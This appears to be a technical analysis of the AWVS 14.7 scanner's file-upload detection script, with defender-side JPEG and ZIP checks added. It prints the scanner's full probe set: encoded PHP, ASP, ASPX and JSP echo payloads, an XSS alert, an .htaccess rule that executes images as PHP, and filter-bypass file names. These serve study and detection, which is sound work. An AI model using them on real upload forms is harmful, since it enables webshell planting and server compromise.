AWVS 14.7 file upload vulnerability detection logic analysis

Analysis of File_Upload.script

[Figure: startTesting() call flow]

startTesting() -> prepareUploadURLs() == true -> the plugin ends.

startTesting() -> prepareUploadURLs() == false -> TestXXEFileUpload() decides whether to raise alertXXE(); execution continues whether or not a vulnerability is found -> the path (this.scheme.path) is obtained, it has a suffix, and the suffix is cgi or pl -> **TestPerlJam2() decides whether to raise alertPerljam2()**; execution continues whether or not a vulnerability is found -> continue.

startTesting() -> prepareUploadURLs() == false -> TestXXEFileUpload() decides whether to raise alertXXE(); execution continues whether or not a vulnerability is found -> the path (this.scheme.path) is not obtained, or it has no suffix, or the suffix is neither cgi nor pl -> **TestZipSymlinkUpload() decides whether to raise alertZipSymlink()**; execution continues whether or not a vulnerability is found -> **TestImageUploadExifXSS()** decides whether to raise **alertEXIFXSS()**; execution continues whether or not a vulnerability is found -> this.existFileUpload() == false -> the plugin ends.

The same chain as above, through TestImageUploadExifXSS() -> this.existFileUpload() == true -> TestFileUpload() is called for the first time -> this.foundOneUploadURL == false -> the plugin ends.

The same chain as above, through the first call to TestFileUpload() -> this.foundOneUploadURL == true -> TestFileUpload() is called a further 19 times in turn, each time with a differently constructed file for the upload test; if a vulnerability is detected, **alert()** is called and the plugin ends.

startTesting()

1.0 If a file input is detected (this.scheme.hasFileInput), call prepareUploadURLs().

2.1 If prepareUploadURLs() returns true, the plugin ends.

2.2 If prepareUploadURLs() returns false, the plugin continues.

3.0 If the AWS S3 interface is being called, call TestXXEFileUpload() (see the detailed description of that function for how it is called).

Regardless of whether TestXXEFileUpload() reports a vulnerability (alertXXE()), execution continues.

4.0 If the path (this.scheme.path) is obtained, it has a suffix, and the suffix is cgi (Common Gateway Interface script) or pl (Perl script), call TestPerlJam2().

5.0 Call TestZipSymlinkUpload(); the call is this.TestZipSymlinkUpload("SanTest" + random(maxRandomNumber) + ".zip", "application/octet-stream").

6.0 Call TestImageUploadExifXSS(); the call is this.TestImageUploadExifXSS("SanTestEXIF" + random(maxRandomNumber) + ".jpg", "image/jpeg").

7.0 Call **this.existFileUpload()** to judge whether the uploaded file is visible; if it is not visible, testing stops here.

8.0 Call TestFileUpload(); the call is this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".jpg", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), detectURLstr).

Decoding the base64 payload gives the image below: a JPEG that carries a one-line PHP echo statement.

[Figure: the decoded payload image]
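As an added example (not code from the AWVS script or from the page), the block below walks the JPEG marker segments of the payload quoted in step 8.0 and pulls out its COM (comment, 0xFFFE) segment, which is where the PHP echo sits; the same walk, run on an uploaded image before it is stored, is a cheap server-side check for script tokens hidden in metadata segments. The payload constant is the page's own base64; the function names, the token list and the clean control buffer are this example's.

```javascript
// Added example: not part of the AWVS script. Walks the JPEG marker segments of the
// payload quoted on this page and extracts the COM (0xFFFE) segment that carries the
// PHP echo. Run on an uploaded image before storage, the same walk flags script
// tokens hidden in metadata segments.

// The base64 payload exactly as it appears in the ".php" call of startTesting().
const PAGE_PAYLOAD_B64 =
  "/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q==";

// Walk marker segments from SOI until SOS or EOI. Stops quietly at the first byte that
// is not a marker, so truncated or malformed input ends the walk instead of throwing.
// Returns [{ marker, data }] where data excludes the 2-byte length field.
function jpegSegments(buf) {
  const segments = [];
  if (buf.length < 2 || buf[0] !== 0xff || buf[1] !== 0xd8) {
    throw new Error("not a JPEG: missing SOI marker");
  }
  let pos = 2;
  while (pos + 4 <= buf.length) {
    if (buf[pos] !== 0xff) break;                     // not positioned on a marker
    const marker = buf[pos + 1];
    if (marker === 0xd9 || marker === 0xda) break;    // EOI, or SOS: entropy-coded data follows
    const len = buf.readUInt16BE(pos + 2);            // the length field counts itself
    segments.push({ marker, data: buf.subarray(pos + 4, pos + 2 + len) });
    pos += 2 + len;
  }
  return segments;
}

// Text of every COM segment, decoded as Latin-1 so each byte maps to one character.
function jpegComments(buf) {
  return jpegSegments(buf)
    .filter((s) => s.marker === 0xfe)
    .map((s) => s.data.toString("latin1"));
}

// Server-side tags that have no business in image metadata (COM and APP0..APP15).
const SCRIPT_TOKENS = [/<\?php/i, /<\?=/, /<%/, /<script\b/i];

function hasScriptInMetadata(buf) {
  return jpegSegments(buf).some((s) => {
    const isMetadata = s.marker === 0xfe || (s.marker >= 0xe0 && s.marker <= 0xef);
    return isMetadata && SCRIPT_TOKENS.some((re) => re.test(s.data.toString("latin1")));
  });
}

// Constructed control: SOI, a bare JFIF APP0 segment, EOI. Not a renderable image,
// just enough structure for the walker to exercise the clean path.
const CLEAN_JPEG = Buffer.from([
  0xff, 0xd8,
  0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01, 0x01, 0x01,
  0x00, 0x48, 0x00, 0x48, 0x00, 0x00,
  0xff, 0xd9,
]);

const payload = Buffer.from(PAGE_PAYLOAD_B64, "base64");
console.log(jpegComments(payload));           // ["<?php echo(md5('sangforr-file-upload-test')); ?>"]
console.log(hasScriptInMetadata(payload));    // true
console.log(hasScriptInMetadata(CLEAN_JPEG)); // false
```

The payload is a structurally valid JPEG (APP0, COM, two DQT, SOF0, DHT, SOS), which is why a check that only looks at the first bytes or at the declared Content-Type passes it; the PHP string lives entirely inside the comment segment and is only dangerous if the server later executes the stored file as PHP.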

9.1 If this.foundOneUploadURL == false, the plugin ends.

9.2 If this.foundOneUploadURL == true, call **TestFileUpload() a further 19 times in turn, each time constructing a different file for the upload test; if a vulnerability is detected, alert()** is called and the plugin ends. The calls, as they appear in the script:

```javascript
// Excerpt from startTesting() in File_Upload.script: the upload tests run once an upload URL
// has been found. numberTests, maxRandomNumber, appletPayload and detectURLstr are referenced
// here but defined elsewhere in the script.
if (!await this.TestFileUpload("Applet" + random(maxRandomNumber) + ".class", "image/jpeg", appletPayload, appletPayload))
    await this.TestFileUpload("Applet" + random(maxRandomNumber) + ".jar", "image/jpeg", appletPayload, appletPayload);
// test xss via svg
await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".svg", "application/xml", b642plain("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"), '<use xlink:href="data:application/xml;base64,', 0, 'svg');
// test xsscanonUrl
if (!await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".htm", "text/html", b642plain("PHNjcmlwdD5hbGVydCgnc2FuZ2ZvciB4c3MgdGVzdCcpOzwvc2NyaXB0Pg=="), "<script>alert('sangfor xss test');</script>", 0, 'html'))
    await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".htm", "image/jpeg", b642plain("PHNjcmlwdD5hbGVydCgnc2FuZ2ZvciB4c3MgdGVzdCcpOzwvc2NyaXB0Pg=="), "<script>alert('sangfor xss test');</script>", 0, 'html');
// test shell upload
ScriptProgress(ComputeProgress(2, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(3, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php.php.rar	", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(4, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php3", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(5, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php\x00.jpg", "image/jpeg", b642plain("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"), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(6, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".phtml", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(7, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php", "text/plain", b642plain("PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+"), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(8, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php.jpg", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(9, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php.123", "image/png", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(10, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php::$DATA", "image/png", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(11, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".htaccess", "image/jpeg", b642plain("I1Nhbmdmb3IgLmh0YWNjZXNzIEZpbGUgVXBsb2FkIHRlc3QNCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAgLmpwZyAucG5nIC5naWYgLmh0bSAuaHRtbCA="), "# .htaccess File Upload test")) return;
ScriptProgress(ComputeProgress(12, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php.ajpg", "image/jpeg", b642plain("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"), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(13, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".asp", "image/jpeg", b642plain("PCUgUmVzcG9uc2UuV3JpdGUoIjRkMDIwNzBlZmZkZDdlMzE5IiArICJjYTU2MWJjNjY2MTdhOGEiKSAlPg=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(14, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".aspx", "image/png", b642plain("PHNjcmlwdCBydW5hdD0ic2VydmVyIiBsYW5ndWFnZT0iQyMiPg0Kdm9pZCBQYWdlX0xvYWQob2JqZWN0IHNlbmRlciwgRXZlbnRBcmdzIGUpew0KICBSZXNwb25zZS5Xcml0ZSgiNGQwMjA3MGVmZmRkN2UzMTkiICsgImNhNTYxYmM2NjYxN2E4YSIpOw0KfQ0KPC9zY3JpcHQ+DQo="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(15, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".asp", "text/plain", b642plain("PCUgUmVzcG9uc2UuV3JpdGUoIjRkMDIwNzBlZmZkZDdlMzE5IiArICJjYTU2MWJjNjY2MTdhOGEiKSAlPg=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(16, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".asp;.jpg", "image/jpeg", b642plain("PCUgUmVzcG9uc2UuV3JpdGUoIjRkMDIwNzBlZmZkZDdlMzE5IiArICJjYTU2MWJjNjY2MTdhOGEiKSAlPg=="), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(17, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".jsp", "image/jpeg", b642plain("PCUgb3V0LnByaW50KCI0ZDAyMDcwZWZmZGQ3ZTMxOSIgKyAiY2E1NjFiYzY2NjE3YThhIik7ICU+"), "963151c21d0fe4a98606a053e7cc9208")) return;
ScriptProgress(ComputeProgress(18, numberTests));
if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".jpg", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208", 1)) return;
```

prepareUploadURLs()

Create an array fileInputList for all file inputs.

For each input, check whether its type is file; if so, add it to fileInputList.

If fileInputList is empty, there is no file upload vulnerability to test for; return true.

If fileInputList is not empty, submit it to the framework function selectVariationsForInputList. This function registers the inputs with the framework and exposes them as the array variations.

Define the array of file upload URLs (this.uploadURLs) with one entry per element of variations, and initialize every entry of this.uploadURLs to **{TO_BE_DETECTED}**.

End.

TestXXEFileUpload()

First create a random value rndToken of length 10 and write it into an XML-format payload.

Create a TList fileInputList for all file inputs.

For each input, check whether its type is file; if so, add it to fileInputList.

Return true if fileInputList is empty.

If fileInputList is not empty, submit it to the framework function selectVariationsForInputList. This function registers the inputs with the framework and exposes the contents of fileInputList as the array variations.

Load the values in variations one at a time (loadVariation()).

Then use setInputFileName(), setInputContentType() and **setInputValue()** to set the file name (passed in when the function is called), the content type (passed in when the function is called) and the file content (the payload; this is where the random string goes).

Send this file, using dnslog for out-of-band detection: if the response does not report an error, or the error code is 983043, and the dnslog records the random token, call alertXXE().

alertXXE() reports the XML_External_Entity_Injection_And_XML_Injection2.xml vulnerability (XXE).


How startTesting() calls it:

First call **this.TestXXEFileUpload("SanTest" + random(maxRandomNumber) + ".xml", "text/xml")**; if that returns false,

call **this.TestXXEFileUpload("SanTest" + random(maxRandomNumber) + ".jpg", "image/jpeg")**.

Regardless of the results of those two calls, call **this.TestXSLTFileUpload("SanTest" + random(maxRandomNumber) + ".xml", "text/xml")**.

TestPerlJam2()

Initialize the variable fileInputName by walking the input points for one whose type is FILE; on the first match, leave the loop and assign it to fileInputName.

Construct a request body using fileInputName.

Send the request as form data; if the response contains certain characteristic strings (root, bin, etc.), call alertPerljam2().

alertPerljam2() reports the Directory_Traversal.xml vulnerability (directory traversal).

TestZipSymlinkUpload()

Create a variable payload as the base64-decoded string. I do not understand the decoded base64 content; it is said online that it is a soft link (symbolic link) that refers to another file or directory by an absolute or relative path.

[Figure: the decoded ZIP payload]

Create a TList fileInputList for all file inputs.

For each input, check whether its type is file; if so, add it to fileInputList.

Return true if fileInputList is empty.

If fileInputList is not empty, submit it to the framework function selectVariationsForInputList. This function registers the inputs with the framework and exposes the contents of fileInputList as the array variations.

Load the values in variations one at a time (loadVariation()).

Then use setInputFileName(), setInputContentType() and **setInputValue()** in turn to set the file name (passed in when the function is called), the content type (passed in when the function is called) and the file content (the payload).

Then send the request. If the response does not report an error:

First check whether the response contains the characteristic strings (root, bin, etc.); if so, call alertZipSymlink() and return true.

If not, base64-decode the response body once; if the decoded content contains the characteristic strings (root, bin, etc.), call alertZipSymlink() and return true.

alertZipSymlink() reports the File_Upload_ZIP_symlink.xml vulnerability (symbolic link inside an uploaded archive).
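The test above works because an extractor that recreates a symbolic link from the archive, and a web root that then serves the link, hands back whatever the link points at; the strings root and bin are what a Unix passwd file would contain. The defender-side counterpart is to refuse such archives before extraction. As an added example (not code from the AWVS script or from the page), the block below builds a small stored ZIP in memory, then reads its central directory and flags entries whose Unix mode marks them as symbolic links, as well as names that would escape the extraction directory. The ZIP field layout is the standard one; the builder, the function names and the sample entries are this example's own.

```javascript
// Added example, not code from the AWVS script or the page. Parses a ZIP's central
// directory and refuses archives that carry symbolic-link entries or names that escape
// the extraction directory, before anything is extracted. The archive is built
// in memory so the example runs offline.

const LOCAL_SIG = 0x04034b50, CENTRAL_SIG = 0x02014b50, EOCD_SIG = 0x06054b50;
const S_IFMT = 0xf000, S_IFLNK = 0xa000;   // Unix file-type mask and the symlink type

function u16(n) { const b = Buffer.alloc(2); b.writeUInt16LE(n); return b; }
function u32(n) { const b = Buffer.alloc(4); b.writeUInt32LE(n >>> 0); return b; }

// Build a stored (uncompressed) ZIP from [{ name, data, unixMode }]. "version made by"
// 0x031e marks host system 3 = Unix, so the Unix mode in the high 16 bits of the external
// attributes is meaningful; a symlink entry's data is its target path. CRC-32 is left at
// zero because the detector never verifies it (a real archiver fills it in).
function buildZip(entries) {
  const locals = [], centrals = [];
  let offset = 0;
  for (const e of entries) {
    const name = Buffer.from(e.name, "utf8");
    const data = Buffer.from(e.data, "utf8");
    const local = Buffer.concat([
      u32(LOCAL_SIG), u16(10), u16(0), u16(0), u16(0), u16(0),
      u32(0), u32(data.length), u32(data.length), u16(name.length), u16(0), name, data,
    ]);
    const central = Buffer.concat([
      u32(CENTRAL_SIG), u16(0x031e), u16(10), u16(0), u16(0), u16(0), u16(0),
      u32(0), u32(data.length), u32(data.length), u16(name.length), u16(0), u16(0),
      u16(0), u16(0), u32(e.unixMode << 16), u32(offset), name,
    ]);
    locals.push(local);
    centrals.push(central);
    offset += local.length;
  }
  const cd = Buffer.concat(centrals);
  const eocd = Buffer.concat([
    u32(EOCD_SIG), u16(0), u16(0), u16(entries.length), u16(entries.length),
    u32(cd.length), u32(offset), u16(0),
  ]);
  return Buffer.concat([...locals, cd, eocd]);
}

// Read the central directory. Returns [{ name, unixMode }]; unixMode is null when the
// archive was not made on a Unix host, because the external attributes then mean something else.
function listEntries(zip) {
  let eocd = -1;
  for (let i = zip.length - 22; i >= 0; i--) {           // the EOCD may be followed by a comment
    if (zip.readUInt32LE(i) === EOCD_SIG) { eocd = i; break; }
  }
  if (eocd < 0) throw new Error("no end-of-central-directory record");
  const count = zip.readUInt16LE(eocd + 10);
  let pos = zip.readUInt32LE(eocd + 16);
  const entries = [];
  for (let i = 0; i < count; i++) {
    if (zip.readUInt32LE(pos) !== CENTRAL_SIG) throw new Error("bad central directory header");
    const hostSystem = zip.readUInt16LE(pos + 4) >> 8;
    const nameLen = zip.readUInt16LE(pos + 28);
    const extraLen = zip.readUInt16LE(pos + 30);
    const commentLen = zip.readUInt16LE(pos + 32);
    const external = zip.readUInt32LE(pos + 38);
    const name = zip.subarray(pos + 46, pos + 46 + nameLen).toString("utf8");
    entries.push({ name, unixMode: hostSystem === 3 ? external >>> 16 : null });
    pos += 46 + nameLen + extraLen + commentLen;
  }
  return entries;
}

// Policy: no symlink entries, no absolute or parent-relative names.
function auditZip(zip) {
  const findings = [];
  for (const e of listEntries(zip)) {
    if (e.unixMode !== null && (e.unixMode & S_IFMT) === S_IFLNK) {
      findings.push({ name: e.name, issue: "symlink entry" });
    }
    const parts = e.name.split(/[\\/]/);
    if (e.name.startsWith("/") || /^[A-Za-z]:/.test(e.name) || parts.includes("..")) {
      findings.push({ name: e.name, issue: "name escapes extraction directory" });
    }
  }
  return findings;
}

// Constructed samples: a benign archive, and one shaped like the scanner's probe.
const BENIGN_ZIP = buildZip([{ name: "readme.txt", data: "hello", unixMode: 0o100644 }]);
const PROBE_ZIP = buildZip([
  { name: "readme.txt", data: "hello", unixMode: 0o100644 },
  { name: "link", data: "/etc/passwd", unixMode: 0o120777 },   // symlink; its data is the target path
  { name: "../escape.txt", data: "x", unixMode: 0o100644 },
]);

console.log(auditZip(BENIGN_ZIP));   // []
console.log(auditZip(PROBE_ZIP));    // symlink "link" and escaping name "../escape.txt"
```

Reading the central directory rather than the local headers matters: extractors trust the central directory, so that is where an attacker-controlled mode or name takes effect. Rejecting the archive is simpler than extracting with link-following disabled, because the second mistake the scanner relies on, serving the extracted tree from the web root, is then never reached.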

TestImageUploadExifXSS()

Create a variable payload as the base64-decoded string. The decoded content should be an image with script embedded in it (an image webshell), containing many alert pop-ups.

[Figure: the decoded EXIF XSS payload]

Create a TList fileInputList for all file inputs.

For each input, check whether its type is file; if so, add it to fileInputList.

Return true if fileInputList is empty.

If fileInputList is not empty, submit it to the framework function selectVariationsForInputList. This function registers the inputs with the framework and exposes the contents of fileInputList as the array variations.

Load the values in variations one at a time (loadVariation()).

Then use setInputFileName(), setInputContentType() and **setInputValue()** in turn to set the file name (passed in when the function is called), the content type (passed in when the function is called) and the file content (the payload).

Then send the request; if the response does not report an error and, after HTML parsing, the tag svg with onload=alert(7346763) is recognized, call alertEXIFXSS().

alertEXIFXSS() reports the File_Upload_XSS.xml vulnerability (XSS triggered through file upload).

TestFileUpload()

1.0 Create a TList fileInputList for all file inputs.

For each input, check whether its type is file; if so, add it to fileInputList.

Return true if fileInputList is empty.

If fileInputList is not empty, submit it to the framework function selectVariationsForInputList. This function registers the inputs with the framework and exposes the contents of fileInputList as the array variations.

Load the values in variations one at a time (loadVariation()).

Then use setInputFileName(), setInputContentType() and **setInputValue()** in turn to set the file name (passed in when the function is called), the content type (passed in when the function is called) and the file content (the payload).

Then send the request.

If the file name contains "\x00.jpg", remove that "\x00.jpg" from it.

If the response does not report an error:

2.1 Check the value of **this.uploadURLs[varIndex]; if this.uploadURLs[varIndex] == {NOT_FOUND}**, leave the function immediately.

2.2 If this.uploadURLs[varIndex] == {TO_BE_DETECTED} or {BRUTEFORCE}:

First test the upload directory determined so far, constructing url = scan path + file name.

2.2.1 Call TestUploadedFileOnUrl(); if it returns true, set this.foundOneUploadURL = true, cut the url at the last "/" of the scanned file path and store that prefix in this.uploadURLs[varIndex]. If lookFor (passed in when the function is called) == detectURLstr (sangforr-file-upload-test), call alert() and return true, leaving the function.

2.2.2 If TestUploadedFileOnUrl() returns false, create pd = getParserData(this.lastJob.response.body, this.lastJob.response.headerValue('content-type')). If pd.getLinks() exists and one of its values contains the file name, create the array links = pd.getLinks(). If the url is served over http and has a domain name (baseDomain), cut the url at the last "/" of the scanned file path, store that prefix in this.uploadURLs[varIndex], and set this.foundOneUploadURL = true. If lookFor (passed in when the function is called) == detectURLstr (sangforr-file-upload-test), call alert() and return true, leaving the function.

